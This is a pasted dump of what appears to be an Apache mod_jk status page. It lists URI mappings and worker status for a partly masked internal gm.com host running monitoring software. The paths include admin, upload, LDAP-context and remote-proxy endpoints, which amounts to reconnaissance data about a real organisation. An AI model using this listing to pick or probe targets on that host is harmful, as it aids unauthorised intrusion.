  383. internalsubsomain.was.here.gm.com:80 /opr-cpdiff-tool Exact uriworkermap -1 0 0 - - - - 0
  384. internalsubsomain.was.here.gm.com:80 /excite-runtime Exact uriworkermap -1 0 0 - - - - 0
  385. internalsubsomain.was.here.gm.com:80 /opr-console Exact uriworkermap -1 0 0 - - - - 0
  386. internalsubsomain.was.here.gm.com:80 /opr-web Exact uriworkermap -1 0 0 - - - - 0
  387. internalsubsomain.was.here.gm.com:80 /excite Exact uriworkermap -1 0 0 - - - - 0
  388. internalsubsomain.was.here.gm.com:80 /opr-pm Exact uriworkermap -1 0 0 - - - - 0
  389. internalsubsomain.was.here.gm.com:80 /*.csv Wildchar uriworkermap -1 0 0 - - - - 0
  390. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /bpi/jsps/bpi/admin/modeler/lib/* Wildchar uriworkermap -1 0 0 - - - - 0
  391. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /*/static/modelExplorer/gwt/MeTreeService Wildchar uriworkermap -1 0 0 - - - - 0
  392. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/gdeopenapi/services/GdeWsOpenAPI Exact uriworkermap -1 0 0 - - - - 0
  393. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/analytics/RealTimeChartServlet/* Wildchar uriworkermap -1 0 0 - - - - 0
  394. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/analytics/DynamicChartServlet/* Wildchar uriworkermap -1 0 0 - - - - 0
  395. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /axis2/services/DiscoveryService/* Wildchar uriworkermap -1 0 0 - - - - 0
  396. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/analytics/ProcessServlet/* Wildchar uriworkermap -1 0 0 - - - - 0
  397. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/analytics/PortalsServlet/* Wildchar uriworkermap -1 0 0 - - - - 0
  398. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/personalization/project/* Wildchar uriworkermap -1 0 0 - - - - 0
  399. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/analytics/AllerezServer/* Wildchar uriworkermap -1 0 0 - - - - 0
  400. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/analytics/GroupServlet/* Wildchar uriworkermap -1 0 0 - - - - 0
  401. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/analytics/AdminServlet/* Wildchar uriworkermap -1 0 0 - - - - 0
  402. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /axis2/services/UcmdbService/* Wildchar uriworkermap -1 0 0 - - - - 0
  403. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/analytics/KpiServlet/* Wildchar uriworkermap -1 0 0 - - - - 0
  404. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/AdminCenter/servlets/* Wildchar uriworkermap -1 0 0 - - - - 0
  405. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/services/technical/* Wildchar uriworkermap -1 0 0 - - - - 0
  406. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/services/business/* Wildchar uriworkermap -1 0 0 - - - - 0
  407. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/analytics/servlet/* Wildchar uriworkermap -1 0 0 - - - - 0
  408. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/gwt/charts/gwt-log Exact uriworkermap -1 0 0 - - - - 0
  409. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/omi/integration/* Wildchar uriworkermap -1 0 0 - - - - 0
  410. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/slm/customers/* Wildchar uriworkermap -1 0 0 - - - - 0
  411. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/bam/open_api/* Wildchar uriworkermap -1 0 0 - - - - 0
  412. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/bsmLight/BPM/* Wildchar uriworkermap -1 0 0 - - - - 0
  413. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/webtools/gwt/* Wildchar uriworkermap -1 0 0 - - - - 0
  414. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/rfw/xml/*.xml Wildchar uriworkermap -1 0 0 - - - - 0
  415. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/rfw/xls/*.xls Wildchar uriworkermap -1 0 0 - - - - 0
  416. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/webtools/gwt/* Wildchar uriworkermap -1 0 0 - - - - 0
  417. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /bpi/webtools/gwt/* Wildchar uriworkermap -1 0 0 - - - - 0
  418. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /bpi/rfw/xls/*.xls Wildchar uriworkermap -1 0 0 - - - - 0
  419. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/rfw/xls/*.xls Wildchar uriworkermap -1 0 0 - - - - 0
  420. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/rfw/xml/*.xml Wildchar uriworkermap -1 0 0 - - - - 0
  421. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /bpi/rfw/xml/*.xml Wildchar uriworkermap -1 0 0 - - - - 0
  422. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/eum/BPRTransactionDefinitionServlet Exact uriworkermap -1 0 0 - - - - 0
  423. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/services/EntityNotificationPort Exact uriworkermap -1 0 0 - - - - 0
  424. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/eum/DownloadScriptServlet Exact uriworkermap -1 0 0 - - - - 0
  425. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /axis2/services/DiscoveryService Exact uriworkermap -1 0 0 - - - - 0
  426. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/eum/DownloadALMZipServlet Exact uriworkermap -1 0 0 - - - - 0
  427. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/j2ee/DataCollectorServlet Exact uriworkermap -1 0 0 - - - - 0
  428. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /uim/composition_manager/*_srv* Wildchar uriworkermap -1 0 0 - - - - 0
  429. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/BacRepositoriesUI/*.rep Wildchar uriworkermap -1 0 0 - - - - 0
  430. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/personalization/project Exact uriworkermap -1 0 0 - - - - 0
  431. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/gdeopenapi/GdeOpenApi Exact uriworkermap -1 0 0 - - - - 0
  432. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /axis2/services/UcmdbService Exact uriworkermap -1 0 0 - - - - 0
  433. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/eum/TCPReportServlet Exact uriworkermap -1 0 0 - - - - 0
  434. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/SnapshotServlet/* Wildchar uriworkermap -1 0 0 - - - - 0
  435. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/monitoring_skin/* Wildchar uriworkermap -1 0 0 - - - - 0
  436. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/dwrsitescopeodm/* Wildchar uriworkermap -1 0 0 - - - - 0
  437. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/rca/rcaFrontComp Exact uriworkermap -1 0 0 - - - - 0
  438. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/bam/*.bamNoProxy Wildchar uriworkermap -1 0 0 - - - - 0
  439. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/eumreportsapi/* Wildchar uriworkermap -1 0 0 - - - - 0
  440. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/servicehealth/* Wildchar uriworkermap -1 0 0 - - - - 0
  441. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/messagebroker/* Wildchar uriworkermap -1 0 0 - - - - 0
  442. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/omi/integration Exact uriworkermap -1 0 0 - - - - 0
  443. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/bpr/BPRServlet Exact uriworkermap -1 0 0 - - - - 0
  444. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/bam/BAMOpenApi Exact uriworkermap -1 0 0 - - - - 0
  445. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/slm/customers Exact uriworkermap -1 0 0 - - - - 0
  446. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/bsmservices/* Wildchar uriworkermap -1 0 0 - - - - 0
  447. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/diagnostics/* Wildchar uriworkermap -1 0 0 - - - - 0
  448. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/ldapContext/* Wildchar uriworkermap -1 0 0 - - - - 0
  449. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /bpi/messagebroker/* Wildchar uriworkermap -1 0 0 - - - - 0
  450. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/messagebroker/* Wildchar uriworkermap -1 0 0 - - - - 0
  451. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/monitoring/* Wildchar uriworkermap -1 0 0 - - - - 0
  452. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/bsmLight/BPM Exact uriworkermap -1 0 0 - - - - 0
  453. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/eumopenapi/* Wildchar uriworkermap -1 0 0 - - - - 0
  454. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/dwrrunbook/* Wildchar uriworkermap -1 0 0 - - - - 0
  455. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/bpmappapi/* Wildchar uriworkermap -1 0 0 - - - - 0
  456. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/sitescope/* Wildchar uriworkermap -1 0 0 - - - - 0
  457. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/eumappapi/* Wildchar uriworkermap -1 0 0 - - - - 0
  458. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/dashboard/* Wildchar uriworkermap -1 0 0 - - - - 0
  459. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /mercury/dynamic/* Wildchar uriworkermap -1 0 0 - - - - 0
  460. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/topaz_api/* Wildchar uriworkermap -1 0 0 - - - - 0
  461. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/bsmLight/* Wildchar uriworkermap -1 0 0 - - - - 0
  462. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/bam/*.bam Wildchar uriworkermap -1 0 0 - - - - 0
  463. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/tdm/*.tdm Wildchar uriworkermap -1 0 0 - - - - 0
  464. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /opal/uibridge/* Wildchar uriworkermap -1 0 0 - - - - 0
  465. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/dwr-pi/* Wildchar uriworkermap -1 0 0 - - - - 0
  466. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/siebel/* Wildchar uriworkermap -1 0 0 - - - - 0
  467. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/appmon/* Wildchar uriworkermap -1 0 0 - - - - 0
  468. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/acweb/* Wildchar uriworkermap -1 0 0 - - - - 0
  469. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /opal/admin/* Wildchar uriworkermap -1 0 0 - - - - 0
  470. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/TMS/* Wildchar uriworkermap -1 0 0 - - - - 0
  471. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/dwr/* Wildchar uriworkermap -1 0 0 - - - - 0
  472. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/rest/* Wildchar uriworkermap -1 0 0 - - - - 0
  473. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /opal/app/* Wildchar uriworkermap -1 0 0 - - - - 0
  474. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/SLMGraphCallBackServletVer_41 Exact uriworkermap -1 0 0 - - - - 0
  475. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/SymphonyRedirectionServlet Exact uriworkermap -1 0 0 - - - - 0
  476. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/OnlineDiagnosticServlet Exact uriworkermap -1 0 0 - - - - 0
  477. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/SLMGraphCallBackServlet Exact uriworkermap -1 0 0 - - - - 0
  478. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/authorizationmanagment Exact uriworkermap -1 0 0 - - - - 0
  479. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/ColorsRetrieverServlet Exact uriworkermap -1 0 0 - - - - 0
  480. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/OfflineReportsServlet Exact uriworkermap -1 0 0 - - - - 0
  481. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/ConfigurationServlet Exact uriworkermap -1 0 0 - - - - 0
  482. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/kpiQueryServiceProxy Exact uriworkermap -1 0 0 - - - - 0
  483. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/VTContextMenuServlet Exact uriworkermap -1 0 0 - - - - 0
  484. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/authorizationcontrol Exact uriworkermap -1 0 0 - - - - 0
  485. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/PrismHandlerServlet Exact uriworkermap -1 0 0 - - - - 0
  486. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /bpi/OfflineReportsServlet Exact uriworkermap -1 0 0 - - - - 0
  487. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/OfflineReportsServlet Exact uriworkermap -1 0 0 - - - - 0
  488. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/JapaneseHelpServlet Exact uriworkermap -1 0 0 - - - - 0
  489. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /filters/CategoriesServlet Exact uriworkermap -1 0 0 - - - - 0
  490. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/VisualFlowMapServlet Exact uriworkermap -1 0 0 - - - - 0
  491. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/SLMCallbackServlet Exact uriworkermap -1 0 0 - - - - 0
  492. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/ContextMenuServlet Exact uriworkermap -1 0 0 - - - - 0
  493. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/businessimpactapi Exact uriworkermap -1 0 0 - - - - 0
  494. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/JavaScriptServlet Exact uriworkermap -1 0 0 - - - - 0
  495. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /filters/FiltersServlet Exact uriworkermap -1 0 0 - - - - 0
  496. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/CMSImagesServlet Exact uriworkermap -1 0 0 - - - - 0
  497. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/TopazSiteServlet Exact uriworkermap -1 0 0 - - - - 0
  498. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/ContextMenuServlet Exact uriworkermap -1 0 0 - - - - 0
  499. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/FrameworkServlet Exact uriworkermap -1 0 0 - - - - 0
  500. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /bpi/ContextMenuServlet Exact uriworkermap -1 0 0 - - - - 0
  501. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/TopazSwitchboard Exact uriworkermap -1 0 0 - - - - 0
  502. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/LazyTreeServlet Exact uriworkermap -1 0 0 - - - - 0
  503. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/CallbackServlet Exact uriworkermap -1 0 0 - - - - 0
  504. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/SlmSiteServlet Exact uriworkermap -1 0 0 - - - - 0
  505. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/LegendsServlet Exact uriworkermap -1 0 0 - - - - 0
  506. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/TopazSiteServlet Exact uriworkermap -1 0 0 - - - - 0
  507. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /bpi/FrameworkServlet Exact uriworkermap -1 0 0 - - - - 0
  508. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/FrameworkServlet Exact uriworkermap -1 0 0 - - - - 0
  509. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/isolateProblem Exact uriworkermap -1 0 0 - - - - 0
  510. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /bpi/TopazSiteServlet Exact uriworkermap -1 0 0 - - - - 0
  511. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /bpi/LazyTreeServlet Exact uriworkermap -1 0 0 - - - - 0
  512. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /opr-config-server/* Wildchar uriworkermap -1 0 0 - - - - 0
  513. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/LazyTreeServlet Exact uriworkermap -1 0 0 - - - - 0
  514. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/servicehealth Exact uriworkermap -1 0 0 - - - - 0
  515. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/FlowMapServlet Exact uriworkermap -1 0 0 - - - - 0
  516. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /utility_portlets/* Wildchar uriworkermap -1 0 0 - - - - 0
  517. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /opr-admin-server/* Wildchar uriworkermap -1 0 0 - - - - 0
  518. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/EmailServlet Exact uriworkermap -1 0 0 - - - - 0
  519. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /freshwater_skin/* Wildchar uriworkermap -1 0 0 - - - - 0
  520. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/remoteProxy Exact uriworkermap -1 0 0 - - - - 0
  521. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /opr-cpdiff-tool/* Wildchar uriworkermap -1 0 0 - - - - 0
  522. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/bsmservices Exact uriworkermap -1 0 0 - - - - 0
  523. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/ldapContext Exact uriworkermap -1 0 0 - - - - 0
  524. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /mam-collectors/* Wildchar uriworkermap -1 0 0 - - - - 0
  525. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /excite-runtime/* Wildchar uriworkermap -1 0 0 - - - - 0
  526. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/EmailServlet Exact uriworkermap -1 0 0 - - - - 0
  527. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /bpi/EmailServlet Exact uriworkermap -1 0 0 - - - - 0
  528. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/PDFServlet Exact uriworkermap -1 0 0 - - - - 0
  529. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /SampleBrowser/* Wildchar uriworkermap -1 0 0 - - - - 0
  530. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /bpi/remoteProxy Exact uriworkermap -1 0 0 - - - - 0
  531. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /TopazSettings/* Wildchar uriworkermap -1 0 0 - - - - 0
  532. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/remoteProxy Exact uriworkermap -1 0 0 - - - - 0
  533. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/bpmappapi Exact uriworkermap -1 0 0 - - - - 0
  534. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/PDFServlet Exact uriworkermap -1 0 0 - - - - 0
  535. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/registerTV Exact uriworkermap -1 0 0 - - - - 0
  536. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/download Exact uriworkermap -1 0 0 - - - - 0
  537. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/bsmLight Exact uriworkermap -1 0 0 - - - - 0
  538. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /bpi/PDFServlet Exact uriworkermap -1 0 0 - - - - 0
  539. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/gateway Exact uriworkermap -1 0 0 - - - - 0
  540. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /opr-console/* Wildchar uriworkermap -1 0 0 - - - - 0
  541. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/kpiapi Exact uriworkermap -1 0 0 - - - - 0
  542. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/slaapi Exact uriworkermap -1 0 0 - - - - 0
  543. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /bpi/download Exact uriworkermap -1 0 0 - - - - 0
  544. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/download Exact uriworkermap -1 0 0 - - - - 0
  545. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /freshwater/* Wildchar uriworkermap -1 0 0 - - - - 0
  546. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/upload Exact uriworkermap -1 0 0 - - - - 0
  547. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/*.jsp Wildchar uriworkermap -1 0 0 - - - - 0
  548. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /ucmdb-api/* Wildchar uriworkermap -1 0 0 - - - - 0
  549. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/acweb Exact uriworkermap -1 0 0 - - - - 0
  550. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/*.tac Wildchar uriworkermap -1 0 0 - - - - 0
  551. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /dashboard/* Wildchar uriworkermap -1 0 0 - - - - 0
  552. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/upload Exact uriworkermap -1 0 0 - - - - 0
  553. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /bpi/upload Exact uriworkermap -1 0 0 - - - - 0
  554. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /webinfra/* Wildchar uriworkermap -1 0 0 - - - - 0
  555. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/*.do Wildchar uriworkermap -1 0 0 - - - - 0
  556. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /rumproxy/* Wildchar uriworkermap -1 0 0 - - - - 0
  557. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /bpi/*.jsp Wildchar uriworkermap -1 0 0 - - - - 0
  558. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/*.jsp Wildchar uriworkermap -1 0 0 - - - - 0
  559. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /opr-web/* Wildchar uriworkermap -1 0 0 - - - - 0
  560. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /uim/*.jsp Wildchar uriworkermap -1 0 0 - - - - 0
  561. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/*.do Wildchar uriworkermap -1 0 0 - - - - 0
  562. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /excite/* Wildchar uriworkermap -1 0 0 - - - - 0
  563. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /bpi/*.do Wildchar uriworkermap -1 0 0 - - - - 0
  564. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /opr-pm/* Wildchar uriworkermap -1 0 0 - - - - 0
  565. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /qcbin/* Wildchar uriworkermap -1 0 0 - - - - 0
  566. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /OVPM/* Wildchar uriworkermap -1 0 0 - - - - 0
  567. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /mcrs/* Wildchar uriworkermap -1 0 0 - - - - 0
  568. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /ext/* Wildchar uriworkermap -1 0 0 - - - - 0
  569. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /cm/* Wildchar uriworkermap -1 0 0 - - - - 0
  570. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /opr-config-server Exact uriworkermap -1 0 0 - - - - 0
  571. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /opr-admin-server Exact uriworkermap -1 0 0 - - - - 0
  572. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /opr-cpdiff-tool Exact uriworkermap -1 0 0 - - - - 0
  573. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /excite-runtime Exact uriworkermap -1 0 0 - - - - 0
  574. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /opr-console Exact uriworkermap -1 0 0 - - - - 0
  575. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /opr-web Exact uriworkermap -1 0 0 - - - - 0
  576. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /excite Exact uriworkermap -1 0 0 - - - - 0
  577. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /opr-pm Exact uriworkermap -1 0 0 - - - - 0
  578. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /*.csv Wildchar uriworkermap -1 0 0 - - - - 0
  579. [S|E|R] Worker Status for wdeWorker
  580.  
  581. Type Hostname Address:Port Connection Pool Timeout Connect Timeout Prepost Timeout Reply Timeout Retries Recovery Options Max Packet Size [Hide]
  582. ajp13 127.0.0.1 127.0.0.1:8010 0 0 0 0 2 0
  583.  
  584. State Acc Err CE RE Wr Rd Busy Max Con LR LE
  585. OK 133834 (0/sec) 0 0 0 2.2P (9.2G/sec) 5.1T (21M/sec) 0 6 25 254433
  586. URI Mappings for wdeWorker (22 maps) [Hide]
  587.  
  588. Server URI Match Type Source Reply Timeout Sticky Ignore Stateless Fail on Status Active Disabled Stopped Use Server Errors
  589. internalsubsomain.was.here.gm.com:80 /topaz/topaz_api/api_reporttransactions_ex.asp Exact uriworkermap -1 0 0 - - - - 0
